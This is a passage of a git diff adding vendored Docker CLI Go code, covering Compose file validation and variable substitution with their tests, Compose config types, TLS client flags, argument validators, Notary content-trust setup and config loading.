dict{ + "version": "3.0", + "services": dict{ + "foo": dict{ + "image": "busybox", + }, + }, + } + + assert.NoError(t, Validate(config, "3.0")) +} + +func TestValidateUndefinedTopLevelOption(t *testing.T) { + config := dict{ + "version": "3.0", + "helicopters": dict{ + "foo": dict{ + "image": "busybox", + }, + }, + } + + err := Validate(config, "3.0") + assert.Error(t, err) + assert.Contains(t, err.Error(), "Additional property helicopters is not allowed") +} + +func TestValidateInvalidVersion(t *testing.T) { + config := dict{ + "version": "2.1", + "services": dict{ + "foo": dict{ + "image": "busybox", + }, + }, + } + + err := Validate(config, "2.1") + assert.Error(t, err) + assert.Contains(t, err.Error(), "unsupported Compose file version: 2.1") +} diff --git a/vendor/github.com/docker/docker/cli/compose/template/template.go b/vendor/github.com/docker/docker/cli/compose/template/template.go new file mode 100644 index 0000000000..28495baf50 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/compose/template/template.go @@ -0,0 +1,100 @@ +package template + +import ( + "fmt" + "regexp" + "strings" +) + +var delimiter = "\\$" +var substitution = "[_a-z][_a-z0-9]*(?::?-[^}]+)?" + +var patternString = fmt.Sprintf( + "%s(?i:(?P%s)|(?P%s)|{(?P%s)}|(?P))", + delimiter, delimiter, substitution, substitution, +) + +var pattern = regexp.MustCompile(patternString) + +// InvalidTemplateError is returned when a variable template is not in a valid +// format +type InvalidTemplateError struct { + Template string +} + +func (e InvalidTemplateError) Error() string { + return fmt.Sprintf("Invalid template: %#v", e.Template) +} + +// Mapping is a user-supplied function which maps from variable names to values. +// Returns the value as a string and a bool indicating whether +// the value is present, to distinguish between an empty string +// and the absence of a value. +type Mapping func(string) (string, bool) + +// Substitute variables in the string with their values +func Substitute(template string, mapping Mapping) (result string, err *InvalidTemplateError) { + result = pattern.ReplaceAllStringFunc(template, func(substring string) string { + matches := pattern.FindStringSubmatch(substring) + groups := make(map[string]string) + for i, name := range pattern.SubexpNames() { + if i != 0 { + groups[name] = matches[i] + } + } + + substitution := groups["named"] + if substitution == "" { + substitution = groups["braced"] + } + if substitution != "" { + // Soft default (fall back if unset or empty) + if strings.Contains(substitution, ":-") { + name, defaultValue := partition(substitution, ":-") + value, ok := mapping(name) + if !ok || value == "" { + return defaultValue + } + return value + } + + // Hard default (fall back if-and-only-if empty) + if strings.Contains(substitution, "-") { + name, defaultValue := partition(substitution, "-") + value, ok := mapping(name) + if !ok { + return defaultValue + } + return value + } + + // No default (fall back to empty string) + value, ok := mapping(substitution) + if !ok { + return "" + } + return value + } + + if escaped := groups["escaped"]; escaped != "" { + return escaped + } + + err = &InvalidTemplateError{Template: template} + return "" + }) + + return result, err +} + +// Split the string at the first occurrence of sep, and return the part before the separator, +// and the part after the separator. +// +// If the separator is not found, return the string itself, followed by an empty string. +func partition(s, sep string) (string, string) { + if strings.Contains(s, sep) { + parts := strings.SplitN(s, sep, 2) + return parts[0], parts[1] + } + return s, "" +} diff --git a/vendor/github.com/docker/docker/cli/compose/template/template_test.go b/vendor/github.com/docker/docker/cli/compose/template/template_test.go new file mode 100644 index 0000000000..6b81bf0a39 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/compose/template/template_test.go @@ -0,0 +1,83 @@ +package template + +import ( + "testing" + + "github.com/stretchr/testify/assert" +) + +var defaults = map[string]string{ + "FOO": "first", + "BAR": "", +} + +func defaultMapping(name string) (string, bool) { + val, ok := defaults[name] + return val, ok +} + +func TestEscaped(t *testing.T) { + result, err := Substitute("$${foo}", defaultMapping) + assert.NoError(t, err) + assert.Equal(t, "${foo}", result) +} + +func TestInvalid(t *testing.T) { + invalidTemplates := []string{ + "${", + "$}", + "${}", + "${ }", + "${ foo}", + "${foo }", + "${foo!}", + } + + for _, template := range invalidTemplates { + _, err := Substitute(template, defaultMapping) + assert.Error(t, err) + assert.IsType(t, &InvalidTemplateError{}, err) + } +} + +func TestNoValueNoDefault(t *testing.T) { + for _, template := range []string{"This ${missing} var", "This ${BAR} var"} { + result, err := Substitute(template, defaultMapping) + assert.NoError(t, err) + assert.Equal(t, "This var", result) + } +} + +func TestValueNoDefault(t *testing.T) { + for _, template := range []string{"This $FOO var", "This ${FOO} var"} { + result, err := Substitute(template, defaultMapping) + assert.NoError(t, err) + assert.Equal(t, "This first var", result) + } +} + +func TestNoValueWithDefault(t *testing.T) { + for _, template := range []string{"ok ${missing:-def}", "ok ${missing-def}"} { + result, err := Substitute(template, defaultMapping) + assert.NoError(t, err) + assert.Equal(t, "ok def", result) + } +} + +func TestEmptyValueWithSoftDefault(t *testing.T) { + result, err := Substitute("ok ${BAR:-def}", defaultMapping) + assert.NoError(t, err) + assert.Equal(t, "ok def", result) +} + +func TestEmptyValueWithHardDefault(t *testing.T) { + result, err := Substitute("ok ${BAR-def}", defaultMapping) + assert.NoError(t, err) + assert.Equal(t, "ok ", result) +} + +func TestNonAlphanumericDefault(t *testing.T) { + result, err := Substitute("ok ${BAR:-/non:-alphanumeric}", defaultMapping) + assert.NoError(t, err) + assert.Equal(t, "ok /non:-alphanumeric", result) +} diff --git a/vendor/github.com/docker/docker/cli/compose/types/types.go b/vendor/github.com/docker/docker/cli/compose/types/types.go new file mode 100644 index 0000000000..cae7b4af26 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/compose/types/types.go @@ -0,0 +1,253 @@ +package types + +import ( + "time" +) + +// UnsupportedProperties not yet supported by this implementation of the compose file +var UnsupportedProperties = []string{ + "build", + "cap_add", + "cap_drop", + "cgroup_parent", + "devices", + "dns", + "dns_search", + "domainname", + "external_links", + "ipc", + "links", + "mac_address", + "network_mode", + "privileged", + "read_only", + "restart", + "security_opt", + "shm_size", + "stop_signal", + "sysctls", + "tmpfs", + "userns_mode", +} + +// DeprecatedProperties that were removed from the v3 format, but their +// use should not impact the behaviour of the application. +var DeprecatedProperties = map[string]string{ + "container_name": "Setting the container name is not supported.", + "expose": "Exposing ports is unnecessary - services on the same network can access each other's containers on any port.", +} + +// ForbiddenProperties that are not supported in this implementation of the +// compose file. +var ForbiddenProperties = map[string]string{ + "extends": "Support for `extends` is not implemented yet. Use `docker-compose config` to generate a configuration with all `extends` options resolved, and deploy from that.", + "volume_driver": "Instead of setting the volume driver on the service, define a volume using the top-level `volumes` option and specify the driver there.", + "volumes_from": "To share a volume between services, define it using the top-level `volumes` option and reference it from each service that shares it using the service-level `volumes` option.", + "cpu_quota": "Set resource limits using deploy.resources", + "cpu_shares": "Set resource limits using deploy.resources", + "cpuset": "Set resource limits using deploy.resources", + "mem_limit": "Set resource limits using deploy.resources", + "memswap_limit": "Set resource limits using deploy.resources", +} + +// Dict is a mapping of strings to interface{} +type Dict map[string]interface{} + +// ConfigFile is a filename and the contents of the file as a Dict +type ConfigFile struct { + Filename string + Config Dict +} + +// ConfigDetails are the details about a group of ConfigFiles +type ConfigDetails struct { + WorkingDir string + ConfigFiles []ConfigFile + Environment map[string]string +} + +// Config is a full compose file configuration +type Config struct { + Services []ServiceConfig + Networks map[string]NetworkConfig + Volumes map[string]VolumeConfig + Secrets map[string]SecretConfig +} + +// ServiceConfig is the configuration of one service +type ServiceConfig struct { + Name string + + CapAdd []string `mapstructure:"cap_add"` + CapDrop []string `mapstructure:"cap_drop"` + CgroupParent string `mapstructure:"cgroup_parent"` + Command []string `compose:"shell_command"` + ContainerName string `mapstructure:"container_name"` + DependsOn []string `mapstructure:"depends_on"` + Deploy DeployConfig + Devices []string + DNS []string `compose:"string_or_list"` + DNSSearch []string `mapstructure:"dns_search" compose:"string_or_list"` + DomainName string `mapstructure:"domainname"` + Entrypoint []string `compose:"shell_command"` + Environment map[string]string `compose:"list_or_dict_equals"` + Expose []string `compose:"list_of_strings_or_numbers"` + ExternalLinks []string `mapstructure:"external_links"` + ExtraHosts map[string]string `mapstructure:"extra_hosts" compose:"list_or_dict_colon"` + Hostname string + HealthCheck *HealthCheckConfig + Image string + Ipc string + Labels map[string]string `compose:"list_or_dict_equals"` + Links []string + Logging *LoggingConfig + MacAddress string `mapstructure:"mac_address"` + NetworkMode string `mapstructure:"network_mode"` + Networks map[string]*ServiceNetworkConfig `compose:"list_or_struct_map"` + Pid string + Ports []string `compose:"list_of_strings_or_numbers"` + Privileged bool + ReadOnly bool `mapstructure:"read_only"` + Restart string + Secrets []ServiceSecretConfig + SecurityOpt []string `mapstructure:"security_opt"` + StdinOpen bool `mapstructure:"stdin_open"` + StopGracePeriod *time.Duration `mapstructure:"stop_grace_period"` + StopSignal string `mapstructure:"stop_signal"` + Tmpfs []string `compose:"string_or_list"` + Tty bool `mapstructure:"tty"` + Ulimits map[string]*UlimitsConfig + User string + Volumes []string + WorkingDir string `mapstructure:"working_dir"` +} + +// LoggingConfig the logging configuration for a service +type LoggingConfig struct { + Driver string + Options map[string]string +} + +// DeployConfig the deployment configuration for a service +type DeployConfig struct { + Mode string + Replicas *uint64 + Labels map[string]string `compose:"list_or_dict_equals"` + UpdateConfig *UpdateConfig `mapstructure:"update_config"` + Resources Resources + RestartPolicy *RestartPolicy `mapstructure:"restart_policy"` + Placement Placement +} + +// HealthCheckConfig the healthcheck configuration for a service +type HealthCheckConfig struct { + Test []string `compose:"healthcheck"` + Timeout string + Interval string + Retries *uint64 + Disable bool +} + +// UpdateConfig the service update configuration +type UpdateConfig struct { + Parallelism *uint64 + Delay time.Duration + FailureAction string `mapstructure:"failure_action"` + Monitor time.Duration + MaxFailureRatio float32 `mapstructure:"max_failure_ratio"` +} + +// Resources the resource limits and reservations +type Resources struct { + Limits *Resource + Reservations *Resource +} + +// Resource is a resource to be limited or reserved +type Resource struct { + // TODO: types to convert from units and ratios + NanoCPUs string `mapstructure:"cpus"` + MemoryBytes UnitBytes `mapstructure:"memory"` +} + +// UnitBytes is the bytes type +type UnitBytes int64 + +// RestartPolicy the service restart policy +type RestartPolicy struct { + Condition string + Delay *time.Duration + MaxAttempts *uint64 `mapstructure:"max_attempts"` + Window *time.Duration +} + +// Placement constraints for the service +type Placement struct { + Constraints []string +} + +// ServiceNetworkConfig is the network configuration for a service +type ServiceNetworkConfig struct { + Aliases []string + Ipv4Address string `mapstructure:"ipv4_address"` + Ipv6Address string `mapstructure:"ipv6_address"` +} + +// ServiceSecretConfig is the secret configuration for a service +type ServiceSecretConfig struct { + Source string + Target string + UID string + GID string + Mode uint32 +} + +// UlimitsConfig the ulimit configuration +type UlimitsConfig struct { + Single int + Soft int + Hard int +} + +// NetworkConfig for a network +type NetworkConfig struct { + Driver string + DriverOpts map[string]string `mapstructure:"driver_opts"` + Ipam IPAMConfig + External External + Internal bool + Labels map[string]string `compose:"list_or_dict_equals"` +} + +// IPAMConfig for a network +type IPAMConfig struct { + Driver string + Config []*IPAMPool +} + +// IPAMPool for a network +type IPAMPool struct { + Subnet string +} + +// VolumeConfig for a volume +type VolumeConfig struct { + Driver string + DriverOpts map[string]string `mapstructure:"driver_opts"` + External External + Labels map[string]string `compose:"list_or_dict_equals"` +} + +// External identifies a Volume or Network as a reference to a resource that is +// not managed, and should already exist. +type External struct { + Name string + External bool +} + +// SecretConfig for a secret +type SecretConfig struct { + File string + External External + Labels map[string]string `compose:"list_or_dict_equals"` +} diff --git a/vendor/github.com/docker/docker/cli/error.go b/vendor/github.com/docker/docker/cli/error.go new file mode 100644 index 0000000000..62f62433b8 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/error.go @@ -0,0 +1,33 @@ +package cli + +import ( + "fmt" + "strings" +) + +// Errors is a list of errors. +// Useful in a loop if you don't want to return the error right away and you want to display after the loop, +// all the errors that happened during the loop. +type Errors []error + +func (errList Errors) Error() string { + if len(errList) < 1 { + return "" + } + + out := make([]string, len(errList)) + for i := range errList { + out[i] = errList[i].Error() + } + return strings.Join(out, ", ") +} + +// StatusError reports an unsuccessful exit by a command. +type StatusError struct { + Status string + StatusCode int +} + +func (e StatusError) Error() string { + return fmt.Sprintf("Status: %s, Code: %d", e.Status, e.StatusCode) +} diff --git a/vendor/github.com/docker/docker/cli/flags/client.go b/vendor/github.com/docker/docker/cli/flags/client.go new file mode 100644 index 0000000000..9b6940f6bd --- /dev/null +++ b/vendor/github.com/docker/docker/cli/flags/client.go @@ -0,0 +1,13 @@ +package flags + +// ClientOptions are the options used to configure the client cli +type ClientOptions struct { + Common *CommonOptions + ConfigDir string + Version bool +} + +// NewClientOptions returns a new ClientOptions +func NewClientOptions() *ClientOptions { + return &ClientOptions{Common: NewCommonOptions()} +} diff --git a/vendor/github.com/docker/docker/cli/flags/common.go b/vendor/github.com/docker/docker/cli/flags/common.go new file mode 100644 index 0000000000..e2f9da0732 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/flags/common.go @@ -0,0 +1,120 @@ +package flags + +import ( + "fmt" + "os" + "path/filepath" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/cliconfig" + "github.com/docker/docker/opts" + "github.com/docker/go-connections/tlsconfig" + "github.com/spf13/pflag" +) + +const ( + // DefaultTrustKeyFile is the default filename for the trust key + DefaultTrustKeyFile = "key.json" + // DefaultCaFile is the default filename for the CA pem file + DefaultCaFile = "ca.pem" + // DefaultKeyFile is the default filename for the key pem file + DefaultKeyFile = "key.pem" + // DefaultCertFile is the default filename for the cert pem file + DefaultCertFile = "cert.pem" + // FlagTLSVerify is the flag name for the tls verification option + FlagTLSVerify = "tlsverify" +) + +var ( + dockerCertPath = os.Getenv("DOCKER_CERT_PATH") + dockerTLSVerify = os.Getenv("DOCKER_TLS_VERIFY") != "" +) + +// CommonOptions are options common to both the client and the daemon. +type CommonOptions struct { + Debug bool + Hosts []string + LogLevel string + TLS bool + TLSVerify bool + TLSOptions *tlsconfig.Options + TrustKey string +} + +// NewCommonOptions returns a new CommonOptions +func NewCommonOptions() *CommonOptions { + return &CommonOptions{} +} + +// InstallFlags adds flags for the common options on the FlagSet +func (commonOpts *CommonOptions) InstallFlags(flags *pflag.FlagSet) { + if dockerCertPath == "" { + dockerCertPath = cliconfig.ConfigDir() + } + + flags.BoolVarP(&commonOpts.Debug, "debug", "D", false, "Enable debug mode") + flags.StringVarP(&commonOpts.LogLevel, "log-level", "l", "info", "Set the logging level (\"debug\", \"info\", \"warn\", \"error\", \"fatal\")") + flags.BoolVar(&commonOpts.TLS, "tls", false, "Use TLS; implied by --tlsverify") + flags.BoolVar(&commonOpts.TLSVerify, FlagTLSVerify, dockerTLSVerify, "Use TLS and verify the remote") + + // TODO use flag flags.String("identity"}, "i", "", "Path to libtrust key file") + + commonOpts.TLSOptions = &tlsconfig.Options{ + CAFile: filepath.Join(dockerCertPath, DefaultCaFile), + CertFile: filepath.Join(dockerCertPath, DefaultCertFile), + KeyFile: filepath.Join(dockerCertPath, DefaultKeyFile), + } + tlsOptions := commonOpts.TLSOptions + flags.Var(opts.NewQuotedString(&tlsOptions.CAFile), "tlscacert", "Trust certs signed only by this CA") + flags.Var(opts.NewQuotedString(&tlsOptions.CertFile), "tlscert", "Path to TLS certificate file") + flags.Var(opts.NewQuotedString(&tlsOptions.KeyFile), "tlskey", "Path to TLS key file") + + hostOpt := opts.NewNamedListOptsRef("hosts", &commonOpts.Hosts, opts.ValidateHost) + flags.VarP(hostOpt, "host", "H", "Daemon socket(s) to connect to") +} + +// SetDefaultOptions sets default values for options after flag parsing is +// complete +func (commonOpts *CommonOptions) SetDefaultOptions(flags *pflag.FlagSet) { + // Regardless of whether the user sets it to true or false, if they + // specify --tlsverify at all then we need to turn on tls + // TLSVerify can be true even if not set due to DOCKER_TLS_VERIFY env var, so we need + // to check that here as well + if flags.Changed(FlagTLSVerify) || commonOpts.TLSVerify { + commonOpts.TLS = true + } + + if !commonOpts.TLS { + commonOpts.TLSOptions = nil + } else { + tlsOptions := commonOpts.TLSOptions + tlsOptions.InsecureSkipVerify = !commonOpts.TLSVerify + + // Reset CertFile and KeyFile to empty string if the user did not specify + // the respective flags and the respective default files were not found. + if !flags.Changed("tlscert") { + if _, err := os.Stat(tlsOptions.CertFile); os.IsNotExist(err) { + tlsOptions.CertFile = "" + } + } + if !flags.Changed("tlskey") { + if _, err := os.Stat(tlsOptions.KeyFile); os.IsNotExist(err) { + tlsOptions.KeyFile = "" + } + } + } +} + +// SetLogLevel sets the logrus logging level +func SetLogLevel(logLevel string) { + if logLevel != "" { + lvl, err := logrus.ParseLevel(logLevel) + if err != nil { + fmt.Fprintf(os.Stderr, "Unable to parse logging level: %s\n", logLevel) + os.Exit(1) + } + logrus.SetLevel(lvl) + } else { + logrus.SetLevel(logrus.InfoLevel) + } +} diff --git a/vendor/github.com/docker/docker/cli/flags/common_test.go b/vendor/github.com/docker/docker/cli/flags/common_test.go new file mode 100644 index 0000000000..81eaa38f43 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/flags/common_test.go @@ -0,0 +1,42 @@ +package flags + +import ( + "path/filepath" + "testing" + + "github.com/docker/docker/cliconfig" + "github.com/docker/docker/pkg/testutil/assert" + "github.com/spf13/pflag" +) + +func TestCommonOptionsInstallFlags(t *testing.T) { + flags := pflag.NewFlagSet("testing", pflag.ContinueOnError) + opts := NewCommonOptions() + opts.InstallFlags(flags) + + err := flags.Parse([]string{ + "--tlscacert=\"/foo/cafile\"", + "--tlscert=\"/foo/cert\"", + "--tlskey=\"/foo/key\"", + }) + assert.NilError(t, err) + assert.Equal(t, opts.TLSOptions.CAFile, "/foo/cafile") + assert.Equal(t, opts.TLSOptions.CertFile, "/foo/cert") + assert.Equal(t, opts.TLSOptions.KeyFile, "/foo/key") +} + +func defaultPath(filename string) string { + return filepath.Join(cliconfig.ConfigDir(), filename) +} + +func TestCommonOptionsInstallFlagsWithDefaults(t *testing.T) { + flags := pflag.NewFlagSet("testing", pflag.ContinueOnError) + opts := NewCommonOptions() + opts.InstallFlags(flags) + + err := flags.Parse([]string{}) + assert.NilError(t, err) + assert.Equal(t, opts.TLSOptions.CAFile, defaultPath("ca.pem")) + assert.Equal(t, opts.TLSOptions.CertFile, defaultPath("cert.pem")) + assert.Equal(t, opts.TLSOptions.KeyFile, defaultPath("key.pem")) +} diff --git a/vendor/github.com/docker/docker/cli/required.go b/vendor/github.com/docker/docker/cli/required.go new file mode 100644 index 0000000000..8ee02c8429 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/required.go @@ -0,0 +1,96 @@ +package cli + +import ( + "fmt" + "strings" + + "github.com/spf13/cobra" +) + +// NoArgs validates args and returns an error if there are any args +func NoArgs(cmd *cobra.Command, args []string) error { + if len(args) == 0 { + return nil + } + + if cmd.HasSubCommands() { + return fmt.Errorf("\n" + strings.TrimRight(cmd.UsageString(), "\n")) + } + + return fmt.Errorf( + "\"%s\" accepts no argument(s).\nSee '%s --help'.\n\nUsage: %s\n\n%s", + cmd.CommandPath(), + cmd.CommandPath(), + cmd.UseLine(), + cmd.Short, + ) +} + +// RequiresMinArgs returns an error if there is not at least min args +func RequiresMinArgs(min int) cobra.PositionalArgs { + return func(cmd *cobra.Command, args []string) error { + if len(args) >= min { + return nil + } + return fmt.Errorf( + "\"%s\" requires at least %d argument(s).\nSee '%s --help'.\n\nUsage: %s\n\n%s", + cmd.CommandPath(), + min, + cmd.CommandPath(), + cmd.UseLine(), + cmd.Short, + ) + } +} + +// RequiresMaxArgs returns an error if there is not at most max args +func RequiresMaxArgs(max int) cobra.PositionalArgs { + return func(cmd *cobra.Command, args []string) error { + if len(args) <= max { + return nil + } + return fmt.Errorf( + "\"%s\" requires at most %d argument(s).\nSee '%s --help'.\n\nUsage: %s\n\n%s", + cmd.CommandPath(), + max, + cmd.CommandPath(), + cmd.UseLine(), + cmd.Short, + ) + } +} + +// RequiresRangeArgs returns an error if there is not at least min args and at most max args +func RequiresRangeArgs(min int, max int) cobra.PositionalArgs { + return func(cmd *cobra.Command, args []string) error { + if len(args) >= min && len(args) <= max { + return nil + } + return fmt.Errorf( + "\"%s\" requires at least %d and at most %d argument(s).\nSee '%s --help'.\n\nUsage: %s\n\n%s", + cmd.CommandPath(), + min, + max, + cmd.CommandPath(), + cmd.UseLine(), + cmd.Short, + ) + } +} + +// ExactArgs returns an error if there is not the exact number of args +func ExactArgs(number int) cobra.PositionalArgs { + return func(cmd *cobra.Command, args []string) error { + if len(args) == number { + return nil + } + return fmt.Errorf( + "\"%s\" requires exactly %d argument(s).\nSee '%s --help'.\n\nUsage: %s\n\n%s", + cmd.CommandPath(), + number, + cmd.CommandPath(), + cmd.UseLine(), + cmd.Short, + ) + } +} diff --git a/vendor/github.com/docker/docker/cli/trust/trust.go b/vendor/github.com/docker/docker/cli/trust/trust.go new file mode 100644 index 0000000000..51914f74b0 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/trust/trust.go @@ -0,0 +1,232 @@ +package trust + +import ( + "encoding/json" + "fmt" + "net" + "net/http" + "net/url" + "os" + "path" + "path/filepath" + "time" + + "github.com/Sirupsen/logrus" + "github.com/docker/distribution/registry/client/auth" + "github.com/docker/distribution/registry/client/auth/challenge" + "github.com/docker/distribution/registry/client/transport" + "github.com/docker/docker/api/types" + registrytypes "github.com/docker/docker/api/types/registry" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/cliconfig" + "github.com/docker/docker/registry" + "github.com/docker/go-connections/tlsconfig" + "github.com/docker/notary" + "github.com/docker/notary/client" + "github.com/docker/notary/passphrase" + "github.com/docker/notary/storage" + "github.com/docker/notary/trustmanager" + "github.com/docker/notary/trustpinning" + "github.com/docker/notary/tuf/data" + "github.com/docker/notary/tuf/signed" +) + +var ( + // ReleasesRole is the role named "releases" + ReleasesRole = path.Join(data.CanonicalTargetsRole, "releases") +) + +func trustDirectory() string { + return filepath.Join(cliconfig.ConfigDir(), "trust") +} + +// certificateDirectory returns the directory containing +// TLS certificates for the given server. An error is +// returned if there was an error parsing the server string. +func certificateDirectory(server string) (string, error) { + u, err := url.Parse(server) + if err != nil { + return "", err + } + + return filepath.Join(cliconfig.ConfigDir(), "tls", u.Host), nil +} + +// Server returns the base URL for the trust server. +func Server(index *registrytypes.IndexInfo) (string, error) { + if s := os.Getenv("DOCKER_CONTENT_TRUST_SERVER"); s != "" { + urlObj, err := url.Parse(s) + if err != nil || urlObj.Scheme != "https" { + return "", fmt.Errorf("valid https URL required for trust server, got %s", s) + } + + return s, nil + } + if index.Official { + return registry.NotaryServer, nil + } + return "https://" + index.Name, nil +} + +type simpleCredentialStore struct { + auth types.AuthConfig +} + +func (scs simpleCredentialStore) Basic(u *url.URL) (string, string) { + return scs.auth.Username, scs.auth.Password +} + +func (scs simpleCredentialStore) RefreshToken(u *url.URL, service string) string { + return scs.auth.IdentityToken +} + +func (scs simpleCredentialStore) SetRefreshToken(*url.URL, string, string) { +} + +// GetNotaryRepository returns a NotaryRepository which stores all the +// information needed to operate on a notary repository. +// It creates an HTTP transport providing authentication support. +func GetNotaryRepository(streams command.Streams, repoInfo *registry.RepositoryInfo, authConfig types.AuthConfig, actions ...string) (*client.NotaryRepository, error) { + server, err := Server(repoInfo.Index) + if err != nil { + return nil, err + } + + var cfg = tlsconfig.ClientDefault() + cfg.InsecureSkipVerify = !repoInfo.Index.Secure + + // Get certificate base directory + certDir, err := certificateDirectory(server) + if err != nil { + return nil, err + } + logrus.Debugf("reading certificate directory: %s", certDir) + + if err := registry.ReadCertsDirectory(cfg, certDir); err != nil { + return nil, err + } + + base := &http.Transport{ + Proxy: http.ProxyFromEnvironment, + Dial: (&net.Dialer{ + Timeout: 30 * time.Second, + KeepAlive: 30 * time.Second, + DualStack: true, + }).Dial, + TLSHandshakeTimeout: 10 * time.Second, + TLSClientConfig: cfg, + DisableKeepAlives: true, + } + + // Skip configuration headers since request is not going to Docker daemon + modifiers := registry.DockerHeaders(command.UserAgent(), http.Header{}) + authTransport := transport.NewTransport(base, modifiers...) + pingClient := &http.Client{ + Transport: authTransport, + Timeout: 5 * time.Second, + } + endpointStr := server + "/v2/" + req, err := http.NewRequest("GET", endpointStr, nil) + if err != nil { + return nil, err + } + + challengeManager := challenge.NewSimpleManager() + + resp, err := pingClient.Do(req) + if err != nil { + // Ignore error on ping to operate in offline mode + logrus.Debugf("Error pinging notary server %q: %s", endpointStr, err) + } else { + defer resp.Body.Close() + + // Add response to the challenge manager to parse out + // authentication header and register authentication method + if err := challengeManager.AddResponse(resp); err != nil { + return nil, err + } + } + + scope := auth.RepositoryScope{ + Repository: repoInfo.FullName(), + Actions: actions, + Class: repoInfo.Class, + } + creds := simpleCredentialStore{auth: authConfig} + tokenHandlerOptions := auth.TokenHandlerOptions{ + Transport: authTransport, + Credentials: creds, + Scopes: []auth.Scope{scope}, + ClientID: registry.AuthClientID, + } + tokenHandler := auth.NewTokenHandlerWithOptions(tokenHandlerOptions) + basicHandler := auth.NewBasicHandler(creds) + modifiers = append(modifiers, transport.RequestModifier(auth.NewAuthorizer(challengeManager, tokenHandler, basicHandler))) + tr := transport.NewTransport(base, modifiers...) + + return client.NewNotaryRepository( + trustDirectory(), + repoInfo.FullName(), + server, + tr, + getPassphraseRetriever(streams), + trustpinning.TrustPinConfig{}) +} + +func getPassphraseRetriever(streams command.Streams) notary.PassRetriever { + aliasMap := map[string]string{ + "root": "root", + "snapshot": "repository", + "targets": "repository", + "default": "repository", + } + baseRetriever := passphrase.PromptRetrieverWithInOut(streams.In(), streams.Out(), aliasMap) + env := map[string]string{ + "root": os.Getenv("DOCKER_CONTENT_TRUST_ROOT_PASSPHRASE"), + "snapshot": os.Getenv("DOCKER_CONTENT_TRUST_REPOSITORY_PASSPHRASE"), + "targets": os.Getenv("DOCKER_CONTENT_TRUST_REPOSITORY_PASSPHRASE"), + "default": os.Getenv("DOCKER_CONTENT_TRUST_REPOSITORY_PASSPHRASE"), + } + + return func(keyName string, alias string, createNew bool, numAttempts int) (string, bool, error) { + if v := env[alias]; v != "" { + return v, numAttempts > 1, nil + } + // For non-root roles, we can also try the "default" alias if it is specified + if v := env["default"]; v != "" && alias != data.CanonicalRootRole { + return v, numAttempts > 1, nil + } + return baseRetriever(keyName, alias, createNew, numAttempts) + } +} + +// NotaryError formats an error message received from the notary service +func NotaryError(repoName string, err error) error { + switch err.(type) { + case *json.SyntaxError: + logrus.Debugf("Notary syntax error: %s", err) + return fmt.Errorf("Error: no trust data available for remote repository %s. Try running notary server and setting DOCKER_CONTENT_TRUST_SERVER to its HTTPS address?", repoName) + case signed.ErrExpired: + return fmt.Errorf("Error: remote repository %s out-of-date: %v", repoName, err) + case trustmanager.ErrKeyNotFound: + return fmt.Errorf("Error: signing keys for remote repository %s not found: %v", repoName, err) + case storage.NetworkError: + return fmt.Errorf("Error: error contacting notary server: %v", err) + case storage.ErrMetaNotFound: + return fmt.Errorf("Error: trust data missing for remote repository %s or remote repository not found: %v", repoName, err) + case trustpinning.ErrRootRotationFail, trustpinning.ErrValidationFail, signed.ErrInvalidKeyType: + return fmt.Errorf("Warning: potential malicious behavior - trust data mismatch for remote repository %s: %v", repoName, err) + case signed.ErrNoKeys: + return fmt.Errorf("Error: could not find signing keys for remote repository %s, or could not decrypt signing key: %v", repoName, err) + case signed.ErrLowVersion: + return fmt.Errorf("Warning: potential malicious behavior - trust data version is lower than expected for remote repository %s: %v", repoName, err) + case signed.ErrRoleThreshold: + return fmt.Errorf("Warning: potential malicious behavior - trust data has insufficient signatures for remote repository %s: %v", repoName, err) + case client.ErrRepositoryNotExist: + return fmt.Errorf("Error: remote trust data does not exist for %s: %v", repoName, err) + case signed.ErrInsufficientSignatures: + return fmt.Errorf("Error: could not produce valid signature for %s. If Yubikey was used, was touch input provided?: %v", repoName, err) + } + + return err +} diff --git a/vendor/github.com/docker/docker/cliconfig/config.go b/vendor/github.com/docker/docker/cliconfig/config.go new file mode 100644 index 0000000000..d81bf86b7a --- /dev/null +++ b/vendor/github.com/docker/docker/cliconfig/config.go @@ -0,0 +1,120 @@ +package cliconfig + +import ( + "fmt" + "io" + "os" + "path/filepath" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/cliconfig/configfile" + "github.com/docker/docker/pkg/homedir" +) + +const ( + // ConfigFileName is the name of config file + ConfigFileName = "config.json" + configFileDir = ".docker" + oldConfigfile = ".dockercfg" +) + +var ( + configDir = os.Getenv("DOCKER_CONFIG") +) + +func init() { + if configDir == "" { + configDir = filepath.Join(homedir.Get(), configFileDir) + } +} + +// ConfigDir returns the directory the configuration file is stored in +func ConfigDir() string { + return configDir +} + +// SetConfigDir sets the directory the configuration file is stored in +func SetConfigDir(dir string) { + configDir = dir +} + +// NewConfigFile initializes an empty configuration file for the given filename 'fn' +func NewConfigFile(fn string) *configfile.ConfigFile { + return &configfile.ConfigFile{ + AuthConfigs: make(map[string]types.AuthConfig), + HTTPHeaders: make(map[string]string), + Filename: fn, + } +} + +// LegacyLoadFromReader is a convenience function that creates a ConfigFile object from +// a non-nested reader +func LegacyLoadFromReader(configData io.Reader) (*configfile.ConfigFile, error) { + configFile := configfile.ConfigFile{ + AuthConfigs: make(map[string]types.AuthConfig), + } + err := configFile.LegacyLoadFromReader(configData) + return &configFile, err +} + +// LoadFromReader is a convenience function that creates a ConfigFile object from +// a reader +func LoadFromReader(configData io.Reader) (*configfile.ConfigFile, error) { + configFile := configfile.ConfigFile{ + AuthConfigs: make(map[string]types.AuthConfig), + } + err := configFile.LoadFromReader(configData) + return &configFile, err +} + +// Load reads the configuration files in the given directory, and sets up +// the auth config information and returns values. +// FIXME: use the internal golang config parser +func Load(configDir string) (*configfile.ConfigFile, error) { + if configDir == "" { + configDir = ConfigDir() + } + + configFile := configfile.ConfigFile{ + AuthConfigs: make(map[string]types.AuthConfig), + Filename: filepath.Join(configDir, ConfigFileName), + } + + // Try happy path first - latest config file + if _, err := os.Stat(configFile.Filename); err == nil { + file, err := os.Open(configFile.Filename) + if err != nil { + return &configFile, fmt.Errorf("%s - %v", configFile.Filename, err) + } + defer file.Close() + err = configFile.LoadFromReader(file) + if err != nil 